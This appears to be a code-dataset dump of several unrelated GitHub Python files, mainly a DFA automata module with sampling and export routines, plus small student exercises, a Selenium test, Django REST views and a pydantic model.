self.transitions.keys():\n tran = self.transitions[s1]\n for letter in tran.keys():\n dot_str += ('{} -> {}[label=\"{}\"]\\n'.format(s1, tran[letter], letter))\n dot_str += (\"}\\n\")\n \n s = Source(dot_str, filename=filename, format=\"png\")\n s.view()\n \n\n def save(self, filename):\n with open(filename + \".dot\", \"w\") as file:\n file.write(\"digraph g {\\n\")\n file.write('__start0 [label=\"\" shape=\"none\"]\\n')\n\n for s in self.states:\n if s in self.final_states:\n shape = \"doublecircle\"\n else:\n shape = \"circle\"\n file.write('{} [shape=\"{}\" label=\"{}\"]\\n'.format(s, shape, s))\n\n file.write('__start0 -> {}\\n'.format(self.init_state))\n\n for s1 in self.transitions.keys():\n tran = self.transitions[s1]\n for letter in tran.keys():\n file.write('{} -> {}[label=\"{}\"]\\n'.format(s1, tran[letter], letter))\n file.write(\"}\\n\")\n\n\n def __str__(self):\n '''\n prints the DFA in a readable format\n '''\n output_str = ''\n output_str += 'Init: '+str(self.init_state) + '\\n'\n output_str += 'States: '+','.join(list(map(str, self.states))) + '\\n'\n output_str += 'Transitions:\\n'\n for state in self.transitions:\n for letter in self.alphabet:\n output_str += str(state)+ '-'+str(letter)+'->'+str(self.transitions[state][letter])+','\n output_str += '\\n'\n output_str += 'Final states: '+','.join(list(map(str,self.final_states)))\n return output_str\n\n def generate_all_accepting_words(self):\n '''\n returns all words that are accepted by the DFA\n '''\n return self.generate_accepting_words(self.init_state)\n\n\n def generate_accepting_words(self, state):\n '''\n returns all words that are accepted by the DFA from a given state\n '''\n all_words = []\n if state in self.final_states:\n all_words += ['']\n\n for letter in self.alphabet:\n # transitions[state][letter] is a single successor state, not a collection\n next_state = self.transitions[state][letter]\n all_words += [letter+word for word in self.generate_accepting_words(next_state)]\n\n return all_words\n\n def generate_num_accepting_words(self, length=-1):\n '''\n Computes the number of words of a particular length that are accepted.\n Use a negative length to compute the shortest accepted word length (which will be returned). 
\n '''\n for i in range(1,self.calculated_till+1): # empty word is buggy, hence starting at 1\n if length<0 and self.number_of_words[(self.init_state,i)] > 0: return i\n for i in range(self.calculated_till+1,(length if length>=0 else len(self.states))+1):\n for state in self.states:\n self.number_of_words[(state, i)] = sum(\n self.number_of_words[(self.transitions[state][letter], i-1)]\n for letter in self.alphabet\n )\n self.calculated_till = i\n if length<0 and self.number_of_words[(self.init_state,i)] > 0: return i\n return i\n\n\n def accepting_word(self):\n ''' returns a minimal word that is accepted\n '''\n # try: return self.generate_random_word_length(-1)\n # except RuntimeError: return None\n return word_with_labels((self,), (True,))\n\n def rejecting_word(self):\n ''' returns a minimal word that is rejected\n '''\n return word_with_labels((self,), (False,))\n \n def intersecting_word(self, *others):\n ''' returns a minimal word that is accepted by both dfas\n '''\n return word_with_labels(\n (self, *others),\n (True, *(True for o in others)),\n )\n\n def generate_random_word(self):\n '''\n returns any random word that is accepted\n '''\n random_length = random.randint(0,100)\n return self.generate_random_word_length(random_length)\n\n # Algorithm taken from https://link.springer.com/article/10.1007/s00453-010-9446-5\n def generate_random_word_length(self, length=-1):\n '''\n returns a random word of a particular length that is accepted\n '''\n length = self.generate_num_accepting_words(length)\n\n rand_word = tuple()\n state = self.init_state\n for i in range(1,length+1):\n transition_list = []\n prob_list = []\n num_accepted_trans = self.number_of_words[(state, length-i+1)]\n if num_accepted_trans == 0: raise RuntimeError(f\"no accepted word of length {length} exist\")\n for letter in self.alphabet:\n # for next_state in self.transitions[state][letter]: # this code is wrong because transitions[s][l] is a SINGLE state\n for next_state in self._next_states([state], letter):\n transition_list.append((letter, next_state))\n prob_list.append(self.number_of_words[(next_state, length-i)]/num_accepted_trans)\n\n next_transition = random.choices(transition_list, weights=prob_list)[0]\n state = next_transition[1]\n \n rand_word+=(next_transition[0],)\t\n return rand_word\n\n\n def generate_random_words_in_batch(self, length_range, batch_size):\n\n epsilon = 0.01\n \n if self.calculated_till < length_range[1]:\n self.generate_num_accepting_words(length_range[1])\n\n word_list = []\n last_path = [] \n prob_dict = {}\n length_list = list(range(length_range[0], length_range[1]+1))\n valid_length = []\n for l in length_list:\n if self.number_of_words[(self.init_state,l)] != 0:\n valid_length.append(l)\n\n if valid_length == []:\n raise Exception('No traces with the given lengths') \n\n transition_count = {}\n\n num=0\n for num in range(batch_size):\n \n rand_word = tuple()\n state = self.init_state\n length = random.choice(valid_length)\n \n \n for i in range(1,length+1):\n non_sink_transitions = [] #letters which lead to some accepting states\n prob_list = []\n count_list = []\n\n for letter in self.alphabet:\n \n next_state = self.transitions[state][letter]\n \n if (state, letter, next_state) not in transition_count:\n transition_count[(state, letter, next_state)] = 0\n \n #print(next_state, self.number_of_words[(next_state, length-i)], length-i)\n if self.number_of_words[(next_state, length-i)] != 0:\n non_sink_transitions.append((state, letter, next_state))\n \n\n\n 
count_list.append(transition_count[(state, letter, next_state)])\n\n\n num_accepted_trans = len(non_sink_transitions)\n total_count = sum(count_list)\n \n for j in range(len(self.alphabet)):\n next_state = self.transitions[state][self.alphabet[j]]\n if self.number_of_words[(next_state, length-i)] != 0:\n if num_accepted_trans == 1:\n transition_prob = 1\n elif total_count == 0:\n transition_prob = (1/num_accepted_trans)\n else:\n transition_prob = (1/num_accepted_trans)*(1-(count_list[j]/total_count))\n \n prob_list.append(transition_prob)\n \n \n \n prob_list = [(i/sum(prob_list)) for i in prob_list]\n \n next_transition = random.choices(non_sink_transitions, weights=prob_list)[0]\n transition_count[next_transition] += 1\n #print(\"Count\", transition_count)\n state = next_transition[2]\n rand_word+=(next_transition[1],)\n \n word_list.append(rand_word)\t\n\n return word_list\n \n\n\n @classmethod\n def from_RPNI(cls, RPNI_output_file_name):\n transitions = dict()\n with open(RPNI_output_file_name) as RPNI_output_file:\n mode = \"general\"\n for line in RPNI_output_file:\n if \"alphabet size\" in line:\n size = int(line.split(\"=\")[1].strip().strip(';'))\n # self.alphabet = list(range(size))\n if \"number of states\" in line:\n num_states = int(line.split(\"=\")[1].strip().strip(';'))\n # self.states = list(range(num_states))\n if \"initial states\" in line:\n mode = \"init\"\n continue\n if \"final states\" in line:\n mode = \"final\"\n continue\n if \"transitions\" in line:\n mode = \"transitions\"\n continue\n\n if mode == \"init\":\n line = line.strip().strip(';')\n listOfStates = line.split(',')\n init_states = [int(s) for s in listOfStates]\n if len(init_states) > 1:\n raise ValueError(\"the automaton has more than 1 initial state\")\n\n if mode == \"final\":\n line = line.strip().strip(';')\n listOfStates = line.split(',')\n accepting_states = list()\n for s in listOfStates:\n if s!= '':\n accepting_states.append(int(s))\n if not accepting_states: # fall back to a random accepting state when none are listed\n accepting_states.append(int(random.choice(range(0,51))))\n\n if mode == \"transitions\":\n line = line.strip().strip(';')\n transition_description = line.split(',')\n transitions[(int(transition_description[0]), int(transition_description[1]))] = int(transition_description[2])\n \n dfa = cls(init_state=init_states[0], final_states=accepting_states, transitions=transitions)\n return dfa\n\n def export_as_RPNI_automaton(self, output_file=sys.stdout, *,\n keep_alphabet=False,\n ):\n if isinstance(output_file, str):\n context = output_file = open(output_file, \"w\")\n else:\n context = open(os.devnull,\"w\")\n with context:\n output_file.write('[general]\\n')\n output_file.write('\\tis dfa = true;\\n')\n output_file.write('\\talphabet size = {};\\n'.format(max(self.alphabet)+1 if keep_alphabet else len(self.alphabet)))\n output_file.write('\\tnumber of states = {};\\n'.format(len(self.states)))\n output_file.write('[initial states]\\n')\n output_file.write('\\t{};\\n'.format(\n ', '.join(str(self.states.index(init_state)) for init_state in self.init_states)\n ))\n output_file.write('[final states]\\n')\n output_file.write('\\t{};\\n'.format(\n ', '.join(str(self.states.index(accepting_state)) for accepting_state in self.accepting_states)\n ))\n output_file.write('[transitions]\\n')\n for (state_from,letter),state_to in self.transitions.items():\n output_file.write('\\t{}, {}, {};\\n'.format(\n self.states.index(state_from),\n letter if keep_alphabet else self.alphabet.index(letter),\n self.states.index(state_to),\n ))\n\n def export_dot(self, output_file=sys.stdout, *,\n 
keep_states=True, keep_alphabet=True,\n group_separator=r'\\n',\n ):\n \"\"\"\n :param group_separator: if set, group transitions between same pair of states. Usually set to ';' or r'\\n'.\n :type group_separator: str or None\n \"\"\"\n if isinstance(output_file, str):\n context = output_file = open(output_file, \"w\")\n else:\n context = open(os.devnull,\"w\")\n with context:\n \"\"\"\n inspiration from:\n src/automata_learning_utils/lib_RPNI/libalf/src/conjecture.cpp\n line 448: string finite_automaton::visualize()\n \"\"\"\n\n # head\n output_file.write('digraph finite_automaton {\\n')\n output_file.write('\\tgraph[fontsize=8];\\n')\n output_file.write('\\trankdir=LR;\\n')\n output_file.write('\\tsize=8;\\n\\n')\n\n # mark final states\n header_written = False\n final_state_count = 0\n const_iterator = {}\n\n if not keep_states:\n # final states\n if (len(self.accepting_states) > 0):\n output_file.write('\\tnode [shape=doublecircle, style=\"\", color=black];')\n for q,state in enumerate(self.states):\n if state not in self.accepting_states: continue\n output_file.write(' q{}'.format(q))\n output_file.write(';\\n')\n # normal states\n if (len(self.accepting_states) < len(self.states)):\n output_file.write('\\tnode [shape=circle, style=\"\", color=black];')\n for q,state in enumerate(self.states):\n if state in self.accepting_states: continue\n output_file.write(' q{}'.format(q))\n output_file.write(';\\n')\n else:\n # states\n for q,state in enumerate(self.states):\n shape = 'doublecircle' if state in self.accepting_states else 'circle'\n output_file.write('\\tnode [shape={}, label=\"{}\", style=\"\", color=black]; q{};\\n'.format(\n shape,\n state,\n q,\n ))\n\n # non-visible states for arrows to initial states\n if (len(self.init_states) > 0):\n output_file.write('\\tnode [shape=plaintext, label=\"\", style=\"\"];')\n for iq,init_state in enumerate(self.init_states):\n output_file.write(' iq{}'.format(iq))\n output_file.write(';\\n')\n\n # and arrows to mark initial states\n for iq,init_state in enumerate(self.init_states):\n output_file.write('\\tiq{} -> q{} [color=blue];\\n'.format(\n iq,\n self.states.index(init_state)\n ))\n\n # transitions\n if group_separator is None:\n # for (state_from,letter),state_to in self.transitions.items():\n for state_from,trans in self.transitions.items():\n for letter,state_to in trans.items():\n output_file.write('\\tq{} -> q{} [label=\"{}\"];\\n'.format(\n self.states.index(state_from),\n self.states.index(state_to),\n letter if keep_alphabet else self.alphabet.index(letter),\n ))\n else:\n grouped_transitions = {}\n # for (state_from,letter),state_to in self.transitions.items():\n for state_from,trans in self.transitions.items():\n for letter,state_to in trans.items():\n grouped_transitions.setdefault((state_from,state_to), set())\n grouped_transitions[(state_from,state_to)].add(letter)\n for (state_from,state_to),letters in grouped_transitions.items():\n # print((state_from,state_to,letter))\n output_file.write('\\tq{} -> q{} [label=\"{}\"];\\n'.format(\n self.states.index(state_from),\n self.states.index(state_to),\n group_separator.join(\n \"{}\".format(letter if keep_alphabet else self.alphabet.index(letter))\n for letter in sorted(letters, key=lambda l: self.alphabet.index(l))\n ),\n ))\n\n # end\n output_file.write('}\\n')\n\n def graphviz(self, filename=None, *args, **kwargs):\n \"\"\"\n Useful in jupyter notebooks!\n See also self.export_dot(*args, **kwargs).\n \"\"\"\n import io\n import graphviz\n source = io.StringIO()\n 
self.export_dot(source, *args, **kwargs)\n gv = graphviz.Source(source.getvalue(), filename=filename)\n if filename: gv.save()\n return gv\n\n # Jupyter integration\n def _repr_mimebundle_(self, *args, **kwargs):\n \"\"\"Return the rendered graph as IPython mimebundle.\"\"\"\n gv = self.graphviz(\n keep_alphabet=True,\n group_separator=\";\",\n )\n try: func = gv._repr_mimebundle_\n except AttributeError as err: raise NotImplementedError() from err\n return func(*args, **kwargs)\n def _repr_svg_(self, *args, **kwargs):\n \"\"\"Return the rendered graph as SVG string.\"\"\"\n gv = self.graphviz(\n keep_alphabet=True,\n group_separator=\";\",\n )\n try: func = gv._repr_svg_\n except AttributeError as err: raise NotImplementedError() from err\n return func(*args, **kwargs)\n\n def size(self):\n return len(self.states)\n\n def _states(self):\n return set(self.states)\n\n def _initial_states(self):\n return set(self.init_states)\n\n def _terminal_states(self):\n return set(self.accepting_states)\n\n def _next_states(self, states, letter):\n # return set(self.transitions[(state,letter)] for state in states)\n return set(self.transitions[state][letter] for state in states)\n\n def test_word(self, word):\n current_states = self._initial_states()\n for letter in word:\n current_states = self._next_states(current_states,letter)\n return len(current_states & self._terminal_states()) != 0\n\n # def __str__(self):\n # writer = io.StringIO()\n # self.export_as_RPNI_automaton(writer)\n # return writer.getvalue()\n def __contains__(self, word):\n return self.test_word(word)\n \n @classmethod\n def from_aalpy(cls, dfa):\n import aalpy.automata\n assert isinstance(dfa, aalpy.automata.Dfa)\n\n init_state = dfa.states.index(dfa.initial_state)\n final_states = [\n dfa.states.index(state)\n for state in dfa.states\n if state.is_accepting\n ]\n transitions = {\n dfa.states.index(s1): {\n l: dfa.states.index(s2)\n for l,s2 in s1.transitions.items()\n }\n for s1 in dfa.states\n }\n \n result = cls(init_state=init_state, final_states=final_states, transitions=transitions)\n return result\n \n def to_aalpy(self):\n import aalpy.automata\n # states = []\n s2state = {}\n for s in self.states:\n state = aalpy.automata.DfaState(s, s in self.final_states)\n # states.append(state)\n s2state[s] = state\n for s,state in s2state.items():\n state.transitions = {\n l: s2state[s2]\n for l,s2 in self.transitions[s].items()\n }\n dfa = aalpy.automata.Dfa(\n initial_state=s2state[self.init_state],\n states=list(s2state.values()),\n )\n return dfa\n\n\n\ndef atom2letters(atom_string, letter2pos, is_word):\n # preprocessing of atom strings\n atom_string = atom_string.replace(' ' ,'')\n\n alphabet = list(letter2pos.keys())\n\n atomlist = atom_string.split('|')\n all_letter_list= set()\n for atom_disjuncts in atomlist:\n sign = {letter:0 for letter in alphabet}\n if atom_string != 'true':\n atoms = atom_disjuncts.split('&')\n for prop in atoms:\n if prop[0]=='~':\n sign[prop[1]] = -1\n else:\n sign[prop[0]] = 1\n letter_list = [[]]\n for letter in alphabet:\n new_letter_list = []\n if sign[letter] == 0:\n for l in letter_list:\n new_letter_list.append(l+[0])\n new_letter_list.append(l+[1])\n \n if sign[letter] == 1:\n for l in letter_list:\n new_letter_list.append(l+[1])\n\n if sign[letter] == -1:\n for l in letter_list:\n new_letter_list.append(l+[0])\n letter_list = new_letter_list\n\n letter_list = set([tuple(l) for l in letter_list])\n all_letter_list= all_letter_list.union(letter_list)\n \n return list(all_letter_list)\n\n\ndef atom2letters_new(atom_string, 
letter2pos, is_word):\n from ltlf2dfa.parser.ltlf import LTLfParser\n \n alphabet = list(letter2pos.keys())\n \n all_letters = set([tuple()])\n for atom in alphabet:\n new_all_letters = {letter+(0,) for letter in all_letters}\t\t\t\n new_all_letters = new_all_letters.union({letter+(1,) for letter in all_letters})\n all_letters = new_all_letters\n\n if is_word:\n all_letters = {i for i in all_letters if sum(i)==1}\n\n if atom_string == 'true':\n \n return all_letters\n\n if atom_string == 'false':\n\n no_letters = []\n return no_letters\n\n parser = LTLfParser()\n atom_formula = parser(atom_string)\n t = (atomformula2letters(atom_formula, letter2pos, all_letters, is_word))\n return t\n\n\ndef atomformula2letters(atom_formula, letter2pos, all_letters, is_word):\n\n try:\n op = atom_formula.operator_symbol\n if op == '&':\n letter_set = all_letters\n for child_atom in atom_formula.formulas:\n l = atomformula2letters(child_atom, letter2pos, all_letters, is_word)\n letter_set = letter_set.intersection(l)\n \n\n elif op == '|':\n letter_set = set()\n for child_atom in atom_formula.formulas:\n l = atomformula2letters(child_atom, letter2pos, all_letters, is_word)\n letter_set = letter_set.union(l)\n\n \n elif op == '!':\n child_atom = atom_formula.f\n l = atomformula2letters(child_atom, letter2pos, all_letters, is_word)\n letter_set = all_letters.difference(l)\n \n\n except AttributeError: # atomic formula: it has no operator_symbol\n alphabet = list(letter2pos.keys())\n atom_list = atom_formula.find_labels()\n assert(len(atom_list)==1)\n letter_set = set([tuple()])\n for atom in alphabet:\n new_letter_set = set()\n if atom in atom_list:\n new_letter_set = new_letter_set.union({letter+(1,) for letter in letter_set})\n else:\n new_letter_set = new_letter_set.union({letter+(0,) for letter in letter_set})\t\t\t\n new_letter_set = new_letter_set.union({letter+(1,) for letter in letter_set})\n letter_set = new_letter_set\n if is_word:\n letter_set = {i for i in letter_set if sum(i)==1}\n return letter_set\n\n\n\ndef ltl2dfa(formula, letter2pos, is_word):\n \"\"\"Convert a formula into a formula string;\n both the infix and the prefix form can be used.\"\"\"\n from ltlf2dfa.parser.ltlf import LTLfParser\n\n formula_str = formula.prettyPrint()\n\n parser = LTLfParser()\n \n formula = parser(formula_str) # returns an LTLfFormula\n\n #d = atom2letters(alphabet = alphabet)\n original_dfa = formula.to_dfa() #using atoms\n return dot2DFA(original_dfa, letter2pos=letter2pos, is_word=is_word)\n \n # create a map from propositions to the corresponding digits\n\n\n\ndef dot2DFA(dot_string, *, letter2pos=None, is_word, group_separator=None):\n\n if isinstance(dot_string,io.TextIOBase):\n dot_string = dot_string.read()\n\n dfa_info = dot_string.split('\\n')\n mode = ''\n transitions = {}\n for line in dfa_info:\n \n if line == '}':\n break\n\n if 'doublecircle' in line:\n line = line.split(']')[1]\n line = line.replace(' ', '')\n final_states = line.split(';')[1:-1]\n\n if '->' in line and mode != 'transitions':\n line = line.replace(' ', '')\n init_state = line.split('->')[1][:-1]\n mode = 'transitions'\n continue\n \n if mode == 'transitions':\n edge, label_info = line.split('[')\n\n edge = edge.replace(' ', '')\n first_state, second_state = edge.split('->')\n\n label = label_info.split('\\\"')[1]\n if letter2pos is not None:\n letters = atom2letters_new(label, letter2pos, is_word)\n elif group_separator is not None:\n letters = label.split(group_separator)\n else:\n letters = [label]\n if first_state == '3':\n #print(label, letters)\n pass\n for letter in letters:\n try:\n 
transitions[first_state][letter] = second_state\n except:\n transitions[first_state] = {letter:second_state}\n\n\n formula_dfa = DFA(\n init_state=init_state,\n final_states=final_states,\n transitions=transitions,\n )\n\n return formula_dfa\n\n#letter2pos = {'p':0, 'q':1, 'r':2, 's':3}\n#print(atom2letters_new('~p & ~r', letter2pos))\n\n# dfa = (ltl2dfa('dummy', letter2pos))\n# dfa_c = dfa.complement()\n# print(dfa_c)\n# dfa_c.show()\n# print(dfa_c.generate_random_word_length(10))\n#print(str(dfa))\n\n# ltl = \"|(X(X(q)),&(F(p),X(q)))\"\n# f = Formula().convertTextToFormula(ltl)\n# letter2pos = {'p':0, 'q':1}\n# dfa = ltl2dfa(f, letter2pos)\n# dfa1 = dfa.complement()\n\n# # print(\"Started\")\n# l= dfa1.generate_random_words_in_batch((10,15), 100000)\n# # print(\"Ended\")\n# for word in l:\n# \tif dfa.is_word_in(word):\n# \t\tprint(word)\n\n#dfa = DFA(1, [2], {1:{'a':2, 'b':2, 'c':1}, 2:{'a':1, 'b':3, 'c':3}, 3:{'a':3, 'b':3, 'c':3}})\n#dfa.show()\n\n\ndef iter_prod(*dfas:Iterable[DFA],\n initial_states:Iterable[Tuple[State]]=None,\n labels:Iterable[Tuple[bool]]=None, # filter on these labels\n):\n \"iterate over all reachable states of the product automata, returning the shortest word to reach each such state.\"\n \n if initial_states is None:\n initial_states = itertools.product(*(dfa._initial_states() for dfa in dfas))\n elif isinstance(initial_states, tuple):\n initial_states = [initial_states]\n \n if labels is not None:\n if isinstance(labels, (tuple,bool)): labels = [labels]\n else: labels = list(labels)\n for i,label in enumerate(labels):\n if not isinstance(label, tuple): labels[i] = tuple(label for dfa in dfas)\n \n alphabet = dfas[0].alphabet\n visited = set(states for states in initial_states)\n word = ()\n queue = [(states,word) for states in visited]\n while queue:\n states, word = queue.pop(0)\n for letter in alphabet:\n word2 = word + (letter,)\n for states2 in itertools.product(*(dfa._next_states([state],letter) for dfa,state in zip(dfas,states))):\n if states2 in visited: continue\n visited.add(states2)\n queue.append((states2,word2))\n \n if labels is not None:\n label = tuple((state in dfa._terminal_states()) for dfa, state in zip(dfas, states))\n if label not in labels: continue\n\n yield states, word\n\ndef word_with_labels(dfas:Iterable[DFA], labels):\n \"\"\"return a word in the product dfa which has the desired labels.\"\"\"\n try: ans = next(iter_prod(*dfas, labels=labels))\n except StopIteration: return None\n states, word = ans\n return word","repo_name":"cryhot/samp2symb","sub_path":"samp2symb/base/dfa.py","file_name":"dfa.py","file_ext":"py","file_size_in_byte":34325,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"41759380219","text":"# A Floater is Prey; it updates by moving mostly in\r\n# a straight line, but with random changes to its\r\n# angle and speed, and displays as ufo.gif (whose\r\n# dimensions (width and height) are computed by\r\n# calling .width()/.height() on the PhotoImage\r\n\r\n\r\n#from PIL.ImageTk import PhotoImage\r\nfrom prey import Prey\r\nfrom random import random\r\n\r\n\r\nclass Floater(Prey): \r\n def __init__(self,x,y):\r\n Prey.__init__(self,x,y,10,10,0,5)\r\n Prey.randomize_angle(self)\r\n self.radius = 5\r\n \r\n \r\n def update(self, model):\r\n if random() > 0.3:\r\n self.move()\r\n else:\r\n fl_spd = 0\r\n while fl_spd < 3 or fl_spd > 7:\r\n fl_spd = self.get_speed()+(random()-0.5)\r\n self.set_speed(fl_spd)\r\n self.set_angle(self.get_angle()+(random()-0.5))\r\n 
self.move()\r\n \r\n \r\n def display(self, canvas):\r\n canvas.create_oval(self.get_location()[0]-self.radius, self.get_location()[1]-self.radius, self.get_location()[0]+self.radius, self.get_location()[1]+self.radius, fill='red')\r\n","repo_name":"nickhuynh83/ICS33-Projects","sub_path":"program5/program5/floater.py","file_name":"floater.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15549257620","text":"\"\"\"\n7. Write a program that reads the ages of several people visiting a show (an\nage of 0 marks the end of the input data), then compute and display:\n• The average age of the audience;\n• The percentage of people aged between 18 and 21;\n• The age of the youngest visitor.\n\"\"\"\n\ntexto_idade = 'Enter your age: '\nidade = int(input(texto_idade))\nsoma_idade = 0\nflag = 0\n# Percentage of people aged between 18 and 21\nporcentagem = float()\nquantidade_idade = 0\nquantidade_porcentagem = 0\nmenor_idade = idade # start the minimum at the first age read\n\nwhile idade != flag:\n quantidade_idade += 1\n soma_idade += idade\n media = soma_idade / quantidade_idade\n if (idade >= 18) and (idade <= 21):\n quantidade_porcentagem += 1\n porcentagem = 100 * quantidade_porcentagem / quantidade_idade\n if idade < menor_idade:\n menor_idade = idade\n print('Enter \"0\" if you want to stop the program.')\n if idade != flag:\n idade = int(input(texto_idade))\n\nprint()\nprint(f'Average age of the audience: {media}.')\nprint(f'Percentage of people aged between 18 and 21: {porcentagem}.')\nprint(f'Age of the youngest visitor at the show: {menor_idade}')\nprint('End of program')\n","repo_name":"yagocdj/IFPB-2022.1-APE","sub_path":"Lista04/Lista04q07.py","file_name":"Lista04q07.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14304936077","text":"from selenium import webdriver\nimport pytest\n\nclass TestAssert():\n def setup(self):\n self.driver = webdriver.Chrome()\n self.driver.get('https://ceshiren.com/')\n self.driver.maximize_window()\n # implicit wait: applied on every find_element call, polling for the element every 0.5s\n self.driver.implicitly_wait(5)\n\n def test_assert(self):\n element = self.driver.find_element_by_link_text('所有分类')\n element.click()\n # after the click the class becomes 'active', so fetch the element again\n element1 = self.driver.find_element_by_link_text('所有分类')\n result = element1.get_attribute('class')\n # assertion\n assert 'active' == result\n\n\n def teardown(self):\n self.driver.quit()\n\nif __name__ == '__main__':\n pytest.main()","repo_name":"yamaxin/hogwarts-lg4-yamaxin","sub_path":"WebDriver_test/test_assert.py","file_name":"test_assert.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3541065247","text":"#coding=utf-8\n\n'''\nProblem description\nRead one line of characters and count, separately, the number of English letters, spaces, digits and other characters it contains.\n /**\n * Count the English letter characters.\n *\n * @param str the input string\n * @return the number of English letters\n */\n public static int getEnglishCharCount(String str)\n {\n return 0;\n }\n\n /**\n * Count the space characters.\n *\n * @param str the input string\n * @return the number of spaces\n */\n public static int getBlankCharCount(String str)\n {\n return 0;\n }\n\n /**\n * Count the digit characters.\n *\n * @param str the input string\n * @return the number of digits\n */\n public static int getNumberCharCount(String str)\n {\n return 0;\n }\n\n /**\n * Count the other characters.\n *\n * @param str the input string\n * @return the number of other characters\n */\n public static int getOtherCharCount(String str)\n {\n return 0;\n }\n\n'''\n\ndef statistic(str):\n 
Englishchar=0\n Blankchar=0\n Numberchar=0\n Otherchar=0\n for i in range(len(str)):\n if 'a'<=str[i]<='z' or 'A'<=str[i]<='Z':\n Englishchar+=1\n elif str[i]==' ':\n Blankchar+=1\n elif '0'<=str[i]<='9':\n Numberchar+=1\n else:\n Otherchar+=1\n\n return Englishchar,Blankchar,Numberchar,Otherchar\nwhile True:\n try:\n\n#str=r\"1qazxsw23 edcvfr45tgbn hy67uj m,ki89ol.\\\\/;p0-=\\\\][\"\n#str=repr(input())\n#str=str[1:-1]\n str=input()\n #print(str)\n\n Englishchar,Blankchar,Numberchar,Otherchar=statistic(str)\n print(Englishchar)\n print(Blankchar)\n print(Numberchar)\n print(Otherchar)\n except EOFError: # stop when the input is exhausted\n break\n","repo_name":"1274085042/Algorithm","sub_path":"Offer/HUAWEI/输入一行字符,分别统计出包含英文字母、空格、数字和其它字符的个数.py","file_name":"输入一行字符,分别统计出包含英文字母、空格、数字和其它字符的个数.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"74137846123","text":"# 2056. Year-Month-Day calendar\nm30 = [4, 6, 9, 11]\nm31 = [1, 3, 5, 7, 8, 10, 12]\n\n\ndef solve(arr):\n # year value y\n y = ''.join(arr[0:4])\n # month value m\n m = ''.join(arr[4:6])\n # day value d\n d = ''.join(arr[6:8])\n if int(m) in m30 and 1 <= int(d) <= 30:\n return y + '/' + m + '/' + d\n elif int(m) in m31 and 1 <= int(d) <= 31:\n return y + '/' + m + '/' + d\n elif int(m) == 2 and 1 <= int(d) <= 28:\n return y + '/' + m + '/' + d\n else:\n return -1\n\n\nT = int(input())\nfor tc in range(1, T + 1):\n ymd = list(input())\n result = solve(ymd)\n print('#{} {}'.format(tc, result))\n","repo_name":"JIH319/cereal","sub_path":"suhyun/week05/2056_연월일 달력.py","file_name":"2056_연월일 달력.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"437155044","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom rest_framework import status\n\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom django.core import serializers\nfrom django.forms.models import model_to_dict\nimport json\n\nfrom .models import Docente, Categoria, AnoLetivo, AreaCientifica,\\\n Cadeira, News, Recurso, Turma, Nota, Calendario\nfrom .serializers import NewsSerializer, RecursoSerializer, NotaSerializer, CalendarioSerializer\n\nfrom rest_framework.pagination import PageNumberPagination\nfrom lei.pagination import NewsPageNumberPagination, CalendarioPageNumberPagination, RecursoPageNumberPagination\n# Create your views here.\n\n\n@api_view(['GET'])\ndef index(request):\n api_urls = {\n # list endpoints\n 'List News': '/news-list',\n 'List Recurso': '/recursos-list',\n 'List RecursoAll': '/allrecursos-list',\n 'List Notas': '/notas-list',\n 'List Lei': '/lei-list',\n 'List calendario': '/calendario-list',\n\n # specific resource\n\n 'Detail Recurso': '/recursos-detail//',\n\n }\n return Response(api_urls)\n\n\n@api_view(['GET'])\n@permission_classes([AllowAny, ])\ndef newsList(request):\n\n news = News.objects.all().order_by('-id')\n paginator = NewsPageNumberPagination()\n news_result = paginator.paginate_queryset(news, request)\n serializer = NewsSerializer(news_result, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n\n@api_view(['GET'])\ndef recursoList(request):\n recursos = Recurso.objects.select_related('cadeira', 'docente', 'categoria', 'anoletivo').all().order_by('-id')\n paginator = RecursoPageNumberPagination()\n recurso_result = paginator.paginate_queryset(recursos, 
request)\n serializer = RecursoSerializer(recurso_result, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n\n# return the resources without pagination\n@api_view(['GET'])\ndef allrecursoList(request):\n recurso = Recurso.objects.select_related('cadeira', 'docente', 'categoria', 'anoletivo').all().order_by('-id')\n serializer = RecursoSerializer(recurso, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef recursoDetail(request, pk):\n recurso = Recurso.objects.get(id=pk)\n serializer = RecursoSerializer(recurso, many=False)\n # print('Recurso:: ',serializer.data)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef notaList(request):\n notas = Nota.objects.select_related('turma').all().order_by('-id')\n\n # dictionary grouping the grades by class\n dicionario = {}\n print(notas)\n\n for nota in notas:\n # print(nota)\n # print(type(nota))\n if nota.turma.turma not in dicionario:\n dicionario[nota.turma.turma] = []\n # serialize the grades\n notaserialized = NotaSerializer(nota, many=False)\n dicionario[nota.turma.turma].append(notaserialized.data)\n # print(dicionario)\n\n serializer = NotaSerializer(notas, many=True)\n return Response(dicionario)\n\n\n@api_view(['GET'])\n@permission_classes([AllowAny, ])\ndef calendarioList(request):\n\n calendario = Calendario.objects.all().order_by('dataInicio')\n serializer = CalendarioSerializer(calendario, many=True)\n return Response(serializer.data)\n\n\n","repo_name":"deji12/testdeployment","sub_path":"lei/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26385696563","text":"from datetime import datetime\nfrom typing import Optional\n\nfrom pydantic import BaseModel\n\n\nclass BaseVehicle(BaseModel):\n plate: str\n brand: str\n model: str\n color: str\n vehicle_type: str\n state: str = \"received\"\n creation_employee_id: str\n update_employee_id: str\n\n\nclass 